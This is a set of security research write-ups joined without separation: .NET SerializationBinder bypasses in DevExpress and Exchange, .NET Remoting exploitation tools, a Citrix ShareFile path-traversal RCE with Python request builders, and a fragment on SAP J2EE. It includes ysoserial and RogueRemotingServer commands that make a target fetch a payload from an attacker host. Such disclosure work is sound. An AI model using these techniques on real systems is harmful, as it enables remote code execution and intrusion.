The BindToName gets called during serialization and allows to control the assemblyName and typeName values that get written to the serialized stream. On the other side, the BindToType gets called during deserialization and allows to control the Type being returned depending on the passed assemblyName and typeName that were read from the serialized stream. As the latter method is abstract, derived classes would need provide their own implementation of that method.
That is probably why developers (mis-)use them as a security measure to prevent the deserialization of malicious types. And it is still widely used, even though those serializers have already been disapproved for obvious reasons.
But using a SerializationBinder for validating the type to be deserialized can be tricky and has pitfalls that may allow to bypass the validation depending on how it is implemented.
What could possibly go wrong?
For validating the specified type, developers can either
work solely on the string representations of the specified assembly name and type name, or
try to resolve the specified type and then work with the returned Type.
Each of these strategies has its own advantages and disadvantages.
Advantages/Disadvantages of Validation Before/After Type Binding
On the other hand, however, the type name parsing is not that straight forward and the internal type parser/binder of .NET allows some unexpected quirks:
whitespace characters (i. e., U+0009, U+000A, U+000D, U+0020) are generally ignored between tokens, in some cases even further characters
type names can begin with a "." (period), e. g., .System.Data.DataSet
assembly names are case-insensitive and can be quoted, e. g., MsCoRlIb and "mscorlib"
assembly attribute values can be quoted, even improperly, e. g., PublicKeyToken="b77a5c561934e089" and PublicKeyToken='b77a5c561934e089
.NET Framework assemblies often only require the PublicKey/PublicKeyToken attribute, e. g., System.Data.DataSet, System.Data, PublicKey=00000000000000000400000000000000 or System.Data.DataSet, System.Data, PublicKeyToken=b77a5c561934e089
assembly attributes can be in arbitrary order, e. g., System.Data, PublicKeyToken=b77a5c561934e089, Culture=neutral, Version=4.0.0.0
arbitrary additional assembly attributes are allowed, e. g., System.Data, Foo=bar, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, Baz=quux
assembly attributes can consist of almost arbitrary data (supported escape sequences: \", \', \,, \/, \=, \\, \n, \r, and \t)
This renders detecting known dangerous types based on their name basically impractical, which, by the way, is always a bad idea. Instead, only known safe types should be allowed and anything else should result in an exception being thrown.
In contrast to that, resolving the type before validation would allow to work with a normalized form of the type. But type resolution/binding may also fail. And depending on how the custom SerializationBinder handles such cases, it can allow attackers to bypass validation.
SerializationBinder Usages
If you keep in mind that the SerializationBinder was supposedly never meant to be used as a security measure (otherwise it would probably have been named SerializationValidator or similar), it gets more clear if you see how it is actually used by the BinaryFormatter, SoapFormatter, and NetDataContractSerializer:
Here, if the BinaryFormatter uses FormatterAssemblyStyle.Simple (i. e., bSimpleAssembly == true, which is the default for BinaryFormatter), then the specified assembly name is used to create an AssemblyName instance and it is then attempted to load the corresponding assembly with it. This must succeed, otherwise ObjectReader.FastBindToType(string, string) immediately returns with null. It is then tried to load the specified type with ObjectReader.GetSimplyNamedTypeFromAssembly(Assembly, string, ref Type).
This method first calls FormatterServices.GetTypeFromAssembly(Assembly, string) that tries to load the type from the already resolved assembly using Assembly.GetType(string) (not depicted here). But if that fails, it uses Type.GetType(string, Func<AssemblyName, Assembly>, Func<Assembly, string, bool, Type>, bool) with the specified type name as first parameter. Now if the specified type name happens to be a AQN, the type loading succeeds and it returns the type specified by the AQN regardless of the already loaded assembly.
That means, unless the custom SerializationBinder.BindToType(string, string) implementation uses the same algorithm as the ObjectReader.FastBindToType(string, string) method, it might be possible to get the custom SerializationBinder to fail while the ObjectReader.FastBindToType(string, string) still succeeds. And if the custom SerializationBinder.BindToType(string, string) method does not throw an exception on failure but silently returns null instead, it would also allow to bypass any type validation implemented in SerializationBinder.BindToType(string, string).
There is also another and probably more convenient way to specify an arbitrary assembly name and type name by using a custom SerializationBinder during serialization:
class CustomSerializationBinder : SerializationBinder
{
public override void BindToName(Type serializedType, out string assemblyName, out string typeName)
{
assemblyName = "…";
typeName = "…";
}
public override Type BindToType(string assemblyName, string typeName)
{
throw new NotImplementedException();
}
}
This allows to fiddle with all assembly names and type names that are used within the object graph to be serialized.
Common Pitfalls of Custom SerializationBinders
There are two common pitfalls that can render a SerializationBinder bypassable:
parsing the passed assembly name and type name differently than the .NET runtime does
resolving the specified type differently than the .NET runtime does
We will demonstrate these with two case studies: the DevExpress framework (CVE-2022-28684) and Microsoft Exchange (CVE-2022-23277).
Case Study № 1: SafeSerializationBinder in DevExpress (CVE-2022-28684)
Despite its name, the DevExpress.Data.Internal.SafeSerializationBinder class of DevExpress.Data is not really a SerializationBinder. But its Ensure(string, string) method is used by the DXSerializationBinder.BindToType(string, string) method to check for safe and unsafe types.
It does this by checking the assembly name and type name against a list of known unsafe types (i. e., UnsafeTypes class) and known safe types (i. e., KnownTypes class). To pass the validation, the former must not match while the latter must match as both XtraSerializationSecurityTrace.UnsafeType(string, string) and XtraSerializationSecurityTrace.NotTrustedType(string, string) result in an exception being thrown.
The check in each Match(string, string) method comprises of a match against so called type ranges and several full type names.
A type range is basically a pair of assembly name and namespace prefix that the passed assembly name and type name are tested against.
Here is the definition of UnsafeTypes.typeRanges that UnsafeTypes.Match(string, string) tests against:
And here UnsafeTypes.types:
This set basically comprises the types used in public gadgets such as those of YSoSerial.Net.
Remember that SafeSerializationBinder.Ensure(string, string) does not resolve the specified type but only works on the assembly names and type names read from the serialized stream. The type binding/resolution attempt happens after the string-based validation in DXSerializationBinder.BindToType(string, string) where Assembly.GetType(string, bool) is used to load the specified type from the specified assembly but without throwing an exception on error (i. e., the passed false).
We'll demonstrate how a System.Data.DataSet can be used to bypass validation in SafeSerializationBinder.Ensure(string, string) despite it is contained in UnsafeTypes.types.
As DXSerializationBinder.BindToType(string, string) can return null in two cases (assembly == null or Assembly.GetType(string, bool) returns null), it is possible to craft the assembly name and type name pair that does fail loading while the fallback ObjectReader.FastBindToType(string, string) still returns the proper type.
With a breakpoint at DXSerializationBinder.BindToType(string, string), we'll see that the first call to SafeSerializationBinder.Ensure(string, string) gets passed. This is because we use the AQN of System.Data.DataSet as type name while UnsafeTypes.types only contains the full name System.Data.DataSet instead. And as the pair of assembly name mscorlib and type name prefix System. is contained in KnownTypes.typeRanges, it will pass validation.
But now the assembly name and type name are passed to SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string):
That method probably tries to extract the type name and assembly name from an AQN passed in the typeName. It does this by looking for the last position of , in typeName and whether the part behind that position starts with version=. If that's not the case, the loop looks for the second last, then the third last, and so on. If version= was found, the algorithm assumes that the next iteration would also contain the assembly name (remember, the version is the first assembly attribute in the normalized form), flag gets set to true and in the next loop the position of the preceeding , marks the delimiter between the type name and assembly name. At the end, the passed assemblyName value stored in a and the extracted assemblyName values get compared. If they differ, true gets returned an the extracted assembly name and type name are checked by another call to SafeSerializationBinder.Ensure(string, string).
With our AQN passed as type name, SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) extracts the proper values so that the call to SafeSerializationBinder.Ensure(string, string) throws an exception. That didn't work.
So in what cases does SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) return false so that the second call to SafeSerializationBinder.Ensure(string, string) does not happen?
There are five return statements: three always return false (lines 28, 36, and 42) and the other two only return false when the passed assemblyName value equals the extracted assembly name (lines 21 and 51).
Let's first look at those always returning false: in two cases (line 28 and 42), the condition depends on whether the typeName contains a ] after the last ,. We can achieve that by adding a custom assembly attribute to our AQN that contains a ], which is perfectly valid:
Now the SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) returns false without updating the typeName or assemblyName values. Loading the mscorlib assembly will succeed but the specified DataSet type won't be found in it so that DXSerializationBinder.BindToType(string, string) also returns null and the ObjectReader.FastBindToType(string, string) attempts to load the type, which finally succeeds.
Case Study № 2: ChainedSerializationBinder in Exchange Server (CVE-2022-23277)
The ChainedSerializationBinder is used for a BinaryFormatter instance created by Microsoft.Exchange.Diagnostics.ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation, bool, string[], string[]) to resolve the specified type and then test it against a set of allowed and disallowed types to abort deserialization in case of a violation.
Within the ChainedSerializationBinder.BindToType(string, string) method, the passed assembly name and type name parameters are forwarded to InternalBindToType(string, string) (not depicted here) and then to LoadType(string, string). Note that only if the type was loaded successfully, it gets validated using the ValidateTypeToDeserialize(Type) method.
Inside LoadType(string, string), it is attempted to load the type by combining both values in various ways, either via Type.GetType(string) or by iterating the already loaded assemblies and then using Assembly.GetType(string) on it. If loading of the type fails, LoadType(string, string) returns null and then BindToType(string, string) also returns null while the validation via ValidateTypeToDeserialize(Type) only happens if the type was successfully loaded.
When the ChainedSerializationBinder.BindToType(string, string) method returns to the ObjectReader.Bind(string, string) method, the fallback method ObjectReader.FastBindToType(string, string) gets called for resolving the type. Now as ChainedSerializationBinder.BindToType(string, string) uses a different algorithm to resolve the type than ObjectReader.FastBindToType(string, string) does, it is possible to bypass the validation of ChainedSerializationBinder via the aforementioned tricks.
Here either of the two ways (a custom marshal class or a custom SerializationBinder during serialization) do work. The following demonstrates this with System.Data.DataSet:
If you happen to encounter a SerializationBinder, check how the type resolution and/or validation is implemented and whether BindToType(string, string) has a case that returns null so that the fallback ObjectReader.FastBindToType(string, string) may get a chance to resolve the type instead.
.NET Remoting is the built-in architecture for remote method invocation in .NET. It is also the origin of the (in-)famous BinaryFormatter and SoapFormatter serializers and not just for that reason a promising target to watch for.
This blog post attempts to give insights into its features, security measures, and especially its weaknesses/vulnerabilities that often result in remote code execution. We're also introducing major additions to the ExploitRemotingService tool, a new ObjRef gadget for YSoSerial.Net, and finally a RogueRemotingServer as counterpart to the ObjRef gadget.
.NET Remoting is deeply integrated into the .NET Framework and allows invocation of methods across so called remoting boundaries. These can be different app domains within a single process, different processes on the same computer, or different processes on different computers. Supported transports between the client and server are HTTP, IPC (named pipes), and TCP.
Here is a simple example for illustration: the server creates and registers a transport server channel and then registers the class as a service with a well-known name at the server's registry:
var channel = new TcpServerChannel(12345);
ChannelServices.RegisterChannel(channel);
RemotingConfiguration.RegisterWellKnownServiceType(
typeof(MyRemotingClass),
"MyRemotingClass"
);
Then a client just needs the URL of the registered service to do remoting with the server:
var remote = (MyRemotingClass)RemotingServices.Connect(
typeof(MyRemotingClass),
"tcp://remoting-server:12345/MyRemotingClass"
);
With this, every invocation of a method or property accessor on remote gets forwarded to the remoting server, executed there, and the result gets returned to the client. This all happens transparently to the developer.
If you are interested in how .NET Remoting works under the hood, here are some insights.
In simple terms: when the client connects to the remoting object provided by the server, it creates a RemotingProxy that implements the specified type MyRemotingClass. All method invocations on remote at the client (except for GetType() and GetHashCode()) will get sent to the server as remoting calls. When a method gets invoked on remote, the proxy creates a MethodCall object that holds the information of the method and passed parameters. It is then passed to a chain of sinks that prepare the MethodCall and handle the remoting communication with the server over the given transport.
On the server side, the received request is also passed to a chain of sinks that reverses the process, which also includes deserialization of the MethodCall object. It ends in a dispatcher sink, which invokes the actual implementation of the method with the passed parameters. The result of the method invocation is then put in a MethodResponse object and gets returned to the client where the client sink chain deserializes the MethodResponse object, extracts the returned object and passes it back to the RemotingProxy.
Channel Sinks
When the client or server creates a channel (either explicitly or implicitly by connecting to a remote service), it also sets up a chain of sinks for processing outgoing and incoming requests. For the server chain, the first sink is a transport sink, followed by formatter sinks (this is where the BinaryFormatter and SoapFormatter are used), and ending in the dispatch sink. It is also possible to add custom sinks. For the three transports, the server default chains are as follows:
Note that the default client sink chain has a default formatter for each transport (HTTP uses SOAP, IPC and TCP use binary format) while the default server sink chain can process both formats. The default sink chains are only used if the channel was not created with an explicit IClientChannelSinkProvider and/or IServerChannelSinkProvider.
Passing Parameters and Return Values
Parameter values and return values can be transfered in two ways:
by value: if either the type is serializable (cf. Type.IsSerializable) or if there is a serialization surrogate for the type (see following paragraphs)
by reference: if type extends MarshalByRefObject (cf. Type.IsMarshalByRef)
In case of the latter, the objects need to get marshaled using one of the RemotingServices.Marshal methods. They register the object at the server's registry and return a ObjRef instance that holds the URL and type information of the marshaled object.
The marshaling happens automatically during serialization by the serialization surrogate class RemotingSurrogate that is used for the BinaryFormatter/SoapFormatter in .NET Remoting (see CoreChannel.CreateBinaryFormatter(bool, bool) and CoreChannel.CreateSoapFormatter(bool, bool)). A serialization surrogate allows to customize serialization/deserialization of specified types.
In case of objects extending MarshalByRefObject, the RemotingSurrogateSelector returns a RemotingSurrogate (see RemotingSurrogate.GetSurrogate(Type, StreamingContext, out ISurrogateSelector)). It then calls the RemotingSurrogate.GetObjectData(Object, SerializationInfo, StreamingContext) method, which calls the RemotingServices.GetObjectData(object, SerializationInfo, StreamingContext), which then calls RemotingServices.MarshalInternal(MarshalByRefObject, string, Type). That basically means, every remoting object extending MarshalByRefObject is substituted with a ObjRef and thus passed by reference instead of by value.
On the receiving side, if an ObjRef gets deserialized by the BinaryFormatter/SoapFormatter, the IObjectReference.GetRealObject(StreamingContext) implementation of ObjRef gets called eventually. That interface method is used to replace an object during deserialization with the object returned by that method. In case of ObjRef, the method results in a call to RemotingServices.Unmarshal(ObjRef, bool), which creates a RemotingProxy of the type and target URL specified in the deserialized ObjRef.
That means, in .NET Remoting all objects extending MarshalByRefObject are passed by reference using an ObjRef. And deserializing an ObjRef with a BinaryFormatter/SoapFormatter (not just limited to .NET Remoting) results in the creation of a RemotingProxy.
With this knowledge in mind, it should be easier to follow the rest of this post.
Previous Work
Most of the issues of .NET Remoting and the runtime serializers BinaryFormatter/SoapFormatter have already been identified by James Forshaw:
We highly encourage you to take the time to read the papers/posts. They are also the foundation of the ExploitRemotingService tool that will be detailed in ExploitRemotingService Explained further down in this post.
Security Features, Pitfalls, and Bypasses
The .NET Remoting is fairly configurable. The following security aspects are built-in and can be configured using special channel and formatter properties:
Pitfalls and important notes on these security features:
HTTP Channel
No security features provided; ought to be implemented in IIS or by custom server sinks.
IPC Channel
By default, access to named pipes created by the IPC server channel are denied to NT Authority\Network group (SID S-1-5-2), i. e., they are only accessible from the same machine. However, by using authorizationGroup, the network restriction is not in place so that the group that is allowed to access the named pipe may also do it remotely (not supported by the default IpcClientTransportSink, though).
TCP Channel
With a secure TCP channel, authentication is required. However, if no custom IAuthorizeRemotingConnection is configured for authorization, it is possible to logon with any valid Windows account, including NT Authority\Anonymous Logon (SID S-1-5-7).
ExploitRemotingService Explained
James Forshaw also released ExploitRemotingService, which contains a tool for attacking .NET Remoting services via IPC/TCP by the various attack techniques. We'll try to explain them here.
There are basically two attack modes:
raw
Exploit BinaryFormatter/SoapFormatter deserialization (see also YSoSerial.Net)
all others commands (see -h)
Write a FakeAsm assembly to the server's file system, load a type from it to register it at the server to be accessible via the existing .NET Remoting channel. It is then accessible via .NET Remoting and can perform various commands.
To see the real beauty of his sorcery and craftsmanship, we'll try to explain the different operating options for the FakeAsm exploitation and their effects:
without options
Send a FakeMessage that extends MarshalByRefObject and thus is a reference (ObjRef) to an object on the attacker's server. On deserialization, the victim's server creates a proxy that transparently forwards all method invocations to the attacker's server. By exploiting a TOCTOU flaw, the get_MethodBase() property method of the sent message (FakeMessage) can be adjusted so that even static methods can be called. This allows to call File.WriteAllBytes(string, byte[]) on the victim's machine.
--useser
Send a forged Hashtable with a custom IEqualityComparer by reference that implements GetHashCode(object), which gets called by the victim server on the attacker's server remotely. As for the key, a FileInfo/DirectoryInfo object is wrapped in SerializationWrapper that ensures the attacker's object gets marshaled by value instead of by reference. However, on the remote call of GetHashCode(object), the victim's server sends the FileInfo/DirectoryInfo by reference so that the attacker has a reference to the FileInfo/DirectoryInfo object on the victim.
--uselease
Call MarshalByRefObject.InitializeLifetimeService() on a published object to get an ILease instance. Then call Register(ISponsor) with an MarshalByRefObject object as parameter to make the server call the IConvertible.ToType(Type, IformatProvider) on an object of the attacker's server, which then can deliver the deserialization payload.
Now the problem with the --uselease option is that the remote class needs to return an actual ILease object and not null. This may happen if the virtual MarshalByRefObject.InitializeLifetimeService() method is overriden. But the main principle of sending an ObjRef referencing an object on the attacker's server can be generalized with any method accepting a parameter. That is why we have added the --useobjref to ExploitRemotingService (see also Community Contributions further below):
--useobjref
Call the MarshalByRefObject.GetObjRef(Type) method with an ObjRef as parameter value. Similarly to --uselease, the server calls IConvertible.ToType(Type, IformatProvider) on the proxy, which sends a remoting call to the attacker's server.
Security Measures and Troubleshooting
If no custom errors are enabled and a RemotingException gets returned by the server, the following may help to identify the cause and to find a solution:
Error
Reason
ExampleRemotingService Options
ExploitRemotingService Bypass Options
"Requested Service not found"
The URI of an existing remoting service must be known; there is no way to iterate them.
n/a
--nulluri may work if remoting service has not been servicing any requests yet.
Our research on .NET Remoting led to some new insights and discoveries that we want to share with the community. Together with this blog post, we have prepared the following contributions and new releases.
ExploitRemotingService
The ExploitRemotingService is already a magnificent tool for exploiting .NET Remoting services. However, we have made some additions to ExploitRemotingService that we think are worthwhile:
--useobjref option
This newly added option allows to use the ObjRef trick described
--remname option
Assemblies can only be loaded by name once. If that loading fails, the runtime remembers that and avoids trying to load it again. That means, writing the FakeAsm.dll to the target server's file system and loading a type from that assembly must succeed on the first attempt. The problem here is to find the proper location to write the assembly to where it will be searched by the runtime (ExploitRemotingService provides the options --autodir and --installdir=… to specify the location to write the DLL to). We have modified ExploitRemotingService to use the --remname to name the FakeAsm assembly so that it is possible to have multiple attempts of writing the assembly file to an appropriate location.
--ipcserver option
As IPC server channels may be accessible remotely, the --ipcserver option allows to specify the server's name for a remote connection.
YSoSerial.Net
The new ObjRef gadget is basically the equivalent of the sun.rmi.server.UnicastRef class used by the JRMPClient gadget in ysoserial for Java: on deserialization via BinaryFormatter/SoapFormatter, the ObjRef gets transformed to a RemotingProxy and method invocations on that object result in the attempt to send an outgoing remote method call to a specified target .NET Remoting endpoint. This can then be used with the RogueRemotingServer described below.
RogueRemotingServer
The newly released RogueRemotingServer is the counterpart of the ObjRef gadget for YSoSerial.Net. It is the equivalent to the JRMPListener server in ysoserial for Java and allows to start a rogue remoting server that delivers a raw BinaryFormatter/SoapFormatter payload via HTTP/IPC/TCP.
Example of ObjRef Gadget and RogueRemotingServer
Here is an example of how these tools can be used together:
# generate a SOAP payload for popping MSPaint
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c MSPaint.exe
> MSPaint.soap
# start server to deliver the payload on all interfaces
RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0/index.html MSPaint.soap
# test the ObjRef gadget with the target http://attacker/index.html
ysoserial.exe -f BinaryFormatter -g ObjRef -o raw -c http://attacker/index.html -t
During deserialization of the ObjRef gadget, an outgoing .NET Remoting method call request gets sent to the RogueRemotingServer, which replies with the TextFormattingRunProperties gadget payload.
Conclusion
.NET Remoting has already been deprecated long time ago for obvious reasons. If you are a developer, don't use it and migrate from .NET Remoting to WCF.
If you have detected a .NET Remoting service and want to exploit it, we'll recommend the excellent ExploitRemotingService by James Forshaw that works with IPC and TCP (for HTTP, have a look at Finding and Exploiting .NET Remoting over HTTP using Deserialisation by Soroush Dalili). If that doesn't succeed, you may want to try it with the enhancements added to our fork of ExploitRemotingService, especially the --useobjref technique and/or naming the FakeAsm assembly via --remname might help. And even if none of these work, you may still be able to invoke arbitrary methods on the exposed objects and take advantage of that.
Citrix ShareFile Storage Zones Controller uses a fork of the third party library NeatUpload. Versions before 5.11.20 are affected by a relative path traversal vulnerability (CTX328123/CVE-2021-22941) when processing upload requests. This can be exploited by unauthenticated users to gain Remote Code Execution.
Come and join us on a walk-though of finding and exploiting this vulnerability.
Background
Part of our activities here at Code White is to monitor what vulnerabilities are published. These are then assessed to determine their criticality and exploitation potential. Depending on that, we inform our clients about affected systems and may also develop exploits for our offensive arsenal.
A first glance at the files contained in the .msi file revealed the third party library NeatUpload.dll. We knew that the latest version contains a Padding Oracle vulnerability, and since the NeatUpload.dll file had the same .NET file version number as ShareFile (i. e., 5.11.18), chances were that somebody had reported that very vulnerability to Citrix.
After installing version 5.11.18 of ShareFile, attaching to the w3wp.exe process with dnSpy and opening NeatUpload.dll, we noticed that the handler class Brettle.Web.NeatUpload.UploadStateStoreHandler was missing. So it must either have been removed by Citrix, or they used an older version. Judging by the other classes in the library, the version used by ShareFile appeared to share similarities with NeatUpload 1.2 available on GitHub.
So, not a quick win after all? As we did not find a previous version of ShareFile such as 5.11.17 that we could use to diff against 5.11.18, we decided to look for the vulnerability in 5.11.18 directly.
Finding A Path From Sink To Source
Since NeatUpload is a file upload handling library, our first attempts focused on analysing its file handling. Here, FileStream was a good candidate to start with. By analysing where that class gets instantiated, the first result already pointed directly to a method in NeatUpload, the Brettle.Web.NeatUpload.UploadContext.WritePersistFile() method. Here a file gets written with what appears to be some kind of metrics of an upload request:
By following the call hierarchy, one eventually ends up in Brettle.Web.NeatUpload.UploadHttpModule.Init(HttpApplication), which is the initialization method for System.Web.IHttpModule:
That method is used to register event handlers that get called during the life cycle of an ASP.NET request. That module is also added to the list of modules in C:\inetpub\wwwroot\Citrix\StorageCenter\web.config:
After verifying that there is a direct path from the UploadHttpModule processing a request to a FileStream constructor, we have to check whether the file path and contents can be controlled. Back in UploadContext.WritePersistFile(), both the file path and contents include the PostBackID property value. By following the call hierarchy of the assignment of the UploadContext.postBackID field that backs that property, there is also a path originating from the UploadHttpModule. In FilteringWorkerRequest.ParseOrThrow(), the return value of a FieldNameTranslator.FileFieldNameToPostBackID(string) call ends up in the assignment of that field:
The condition of that if branch is that text5 and text4 are set and that FieldNameTranslator.FileFieldNameToPostBackID(string) returns a value for text4. text5 originates from the filename attribute of a Content-Disposition multi-part header and text4 from its name attribute (see lines 514–517). That means, the request must be a multipart message with one part having a header like this:
As for text6, the FieldNameTranslator.FileFieldNameToPostBackID(string) method call returns the value of the FieldNameTranslator.PostBackID field if present:
By following the assignment of that FieldNameTranslator.PostBackID field, it becomes clear that the internal constructor of FieldNameTranslator takes it from a request query string parameter:
So, let's summarize our knowledge of the HTTP request requirements so far:
The request path and query string are not yet known, so we'll simply use dummies. This works because HTTP modules are not bound to paths like HTTP handlers are.
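The requirements gathered so far can be sketched as a raw request. This is a minimal sketch: the path, host, field names and boundary are dummies of our own choosing, not values taken from ShareFile.

```python
# A minimal sketch of the requirements known so far. Path, host, field names
# and boundary are dummies -- only the multipart shape matters: one part must
# carry both a name and a filename attribute so that text4 and text5 in
# FilteringWorkerRequest.ParseOrThrow() are populated.
BOUNDARY = "----probe"

def build_probe_request() -> str:
    body = (
        f"--{BOUNDARY}\r\n"
        'Content-Disposition: form-data; name="file"; filename="test.txt"\r\n'
        "\r\n"
        "dummy content\r\n"
        f"--{BOUNDARY}--\r\n"
    )
    return (
        # Dummy path: HTTP modules are not bound to a path like handlers are.
        "POST /default.aspx HTTP/1.1\r\n"
        "Host: sharefile.example\r\n"  # hypothetical host
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n" + body
    )

print(build_probe_request())
```

The exact path and parameter names are refined in the debugging steps that follow.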
Important Checkpoints Along The Route
Let's set breakpoints at some critical points and ensure they get reached and behave as assumed:
UploadHttpModule.Application_BeginRequest() – to ensure the HTTP module is actually active (the BeginRequest event handler is the first in the chain of raised events)
FieldNameTranslator..ctor() – to ensure the FieldNameTranslator.PostBackID field gets set with our value
FilteringWorkerRequest.ParseOrThrow() – to ensure the multipart parsing works as expected
UploadContext.set_PostBackID(string) – to ensure the UploadContext.postBackID field is set with our value
UploadContext.WritePersistFile() – to ensure the file path and content contain our value
After sending the request, the breakpoint at UploadHttpModule.Application_BeginRequest() should be hit. Here we can also see that the module expects the RawUrl to contain upload and .aspx:
Let's change default.aspx to upload.aspx and send the request again. This time the breakpoint at the constructor of FieldNameTranslator should be hit. Here we can see that the PostBackID field value is taken from a query string parameter named id or uploadid (which is actually configured in the web.config file).
After sending a new request with the query string id=foo, our next breakpoint at FilteringWorkerRequest.ParseOrThrow() should be hit. After stepping through that method, you'll notice that some additional parameters bp and accountid are expected:
Let's add them with bogus values and try it again. This time the breakpoint at UploadContext.WritePersistFile() should get hit, where the FileStream gets created:
So now we have reached the FileStream constructor, but the UploadContext.PostBackID field value is null as it hasn't been set yet.
Are We Still On Track?
You may have noticed that the breakpoint at UploadContext.set_PostBackID(string) also hasn't been hit yet. This is because the while loop in FilteringWorkerRequest.ParseOrThrow() uses the result of FilteringWorkerRequest.CopyUntilBoundary(string, string, string) as its condition, but that call returns false on its first invocation, so the while block never gets executed.
When looking at the code of CopyUntilBoundary(string, string, string) (not depicted here), it appears that it fills a buffer with the posted data and returns false if _doneReading is true. The byte array tmpBuffer has a size of 4096 bytes, which our minimalistic example request certainly does not exceed.
After sending a multipart part that is larger than 4096 bytes, the breakpoint at the FileStream should get hit twice: once with a null value originating from the while condition's FilteringWorkerRequest.CopyUntilBoundary(string, string, string) call, and once with foo originating from within the while block:
Stepping into the FileStream constructor also shows the resulting path, which is C:\inetpub\wwwroot\Citrix\StorageCenter\context\foo. Although context does not exist, we're already within the document root directory that the w3wp.exe process user has full control of:
Let's prove this by writing a file to it using id=../foo:
We have reached our destination: we can write into the web root directory!
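Putting all discovered requirements together, the final probing request can be sketched as follows. Host, field names and boundary remain placeholders, and the placement of bp and accountid as query parameters is an assumption from our debugging session; only their presence mattered.

```python
# Sketch of the full request: the URL contains "upload" and ".aspx", the
# traversal value goes into the "id" query parameter, "bp" and "accountid"
# get bogus values (assumed here to be query parameters), and the file part
# is padded beyond the 4096-byte tmpBuffer so that CopyUntilBoundary()
# returns true and the while block runs.
BOUNDARY = "----poc"

def build_exploit_request(post_back_id: str = "../foo") -> bytes:
    padding = b"A" * 5000  # exceed the 4096-byte buffer
    body = (
        (
            f"--{BOUNDARY}\r\n"
            'Content-Disposition: form-data; name="file"; filename="test.txt"\r\n'
            "\r\n"
        ).encode()
        + padding
        + f"\r\n--{BOUNDARY}--\r\n".encode()
    )
    head = (
        f"POST /upload.aspx?id={post_back_id}&bp=x&accountid=x HTTP/1.1\r\n"
        "Host: sharefile.example\r\n"  # hypothetical host
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return head + body

request = build_exploit_request()
print(request.split(b"\r\n", 1)[0])  # request line carrying the traversal id
```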
What's In The Backpack?
Now that we're able to write files, how can we exploit this? We have to keep in mind that the id/uploadid parameter is used for both the file path and the content.
That means the restriction is that we can only use characters that are valid in Windows file system paths. According to the naming conventions for files and paths, the following characters are not allowed:
Characters in the range 0–31 (0x00–0x1F)
< (less than)
> (greater than)
: (colon)
" (double quote)
| (vertical bar or pipe)
? (question mark)
* (asterisk)
Here, especially < and > are painful, as we can't write an .aspx web shell, which would require <% … %> or <script runat="server">…</script> blocks. Binary files like DLLs are also out, as they require bytes in the range 0–31.
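Which payload characters survive these restrictions can be checked in a few lines; the forbidden set is taken straight from the list above:

```python
# Reserved Windows path characters plus the control range 0-31: anything the
# id/uploadid value contains must stay outside this set.
FORBIDDEN = set('<>:"|?*') | {chr(c) for c in range(32)}

def usable_in_path(payload: str) -> bool:
    return not any(ch in FORBIDDEN for ch in payload)

print(usable_in_path("<% evil %>"))  # False: ASPX delimiters are blocked
print(usable_in_path("@(1+1)"))      # True: Razor syntax can avoid the set
```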
So, is that the end of this journey? At best a denial of service when overwriting existing files? Have we already tried hard enough?
Running With Razor
If you are a little more familiar with ASP.NET, you will probably know that there are not just Web Forms (i. e., .aspx, .ashx, .asmx, etc.) but also two other web application frameworks, one of them being MVC (model/view/controller). And while the models and controllers are compiled to binary assemblies, the views are implemented in separate .cshtml files. These use a different syntax, the Razor syntax, which uses the @ symbol to transition from HTML to C#:
@("Hello, World!")
And ShareFile does not just use Web Forms but also MVC:
Note that we can't just add new views as their rendering is driven by the corresponding controller. But we can overwrite an existing view file like the ConfigService\Views\Shared\Error.cshtml, which is accessible via /ConfigService/Home/Error:
What is still missing is writing the actual payload using Razor syntax. We won't show this here, but here is a hint: unlike Unix-based systems, Windows doesn't require each segment of a file path to exist, as the path gets resolved symbolically. That means we could use additional "directories" to contain the payload as long as we "step out" of them again so that the resolved path still points to the right file.
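The hinted-at trick can be illustrated lexically with Python's ntpath module; the directory name below is a stand-in for an arbitrary, path-safe payload of our own invention, and ntpath only mimics the string-level part of Windows path resolution:

```python
import ntpath

# The "payload" directory never has to exist on disk: the following ".."
# segment removes it during resolution, so the final path still points at
# the view file being overwritten.
payload_segment = "@(1+1)"  # stand-in for a path-safe Razor payload
raw = f"Views/Shared/{payload_segment}/../Error.cshtml"
print(ntpath.normpath(raw))  # Views\Shared\Error.cshtml
```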
Timeline And Fix
Code White reported the vulnerability to Citrix on May 14th. On August 25th, Citrix released ShareFile Storage Zones Controller 5.11.20, which addresses the vulnerability by validating the passed value before assigning FieldNameTranslator.PostBackID:
This blog post describes the research on SAP J2EE Engine 7.50 I did between
October 2020 and January 2021. The first part describes how I set off to find a
pure SAP deserialization gadget, which would allow to leverage SAP's P4 protocol
for exploitation, and how that led me, by sheer coincidence, to an entirely
unrelated, yet critical vulnerability, which is outlined in part two.
The reader is assumed to be familiar with Java Deserialization and should have a
basic understanding of Remote Method Invocation (RMI) in Java.
Prologue
It was in 2016 when I first started to look into the topic of Java Exploitation, or,
more precisely: into exploitation of unsafe deserialization of Java objects.
Because of my professional history, it made sense to have a look at an SAP
product that was written in Java. Naturally, the P4 protocol of SAP NetWeaver
Java caught my attention since it is an RMI-like protocol for remote
administration, similar to Oracle WebLogic's T3. In May 2017, I published a
blog post about an exploit that was getting RCE by using the Jdk7u21 gadget. At
that point, SAP had already provided a fix long ago. Since then, the subject
has not left me alone. While there were new deserialization
gadgets for Oracle's Java server product almost every month, it surprised me that no one had ever heard of
an SAP deserialization gadget with comparable impact. Even
more so, since everybody who knows SAP software knows the vast amount of code
they ship with each of their products. It seemed very improbable to me that
they would be absolutely immune to the most prominent bug class in the
Java world of the past six years. In October 2020 I finally found the time and
energy to set off for a new hunt. To my great disappointment, the search was in
the end not successful. A gadget that yields RCE similar to the ones from the
famous ysoserial project is still not in sight. However, in January, I found a
completely unprotected RMI call that in the end yielded administrative access
to the J2EE Engine. Besides the fact that it can be invoked through P4 it has
nothing in common with the deserialization topic. Even though a mere chance
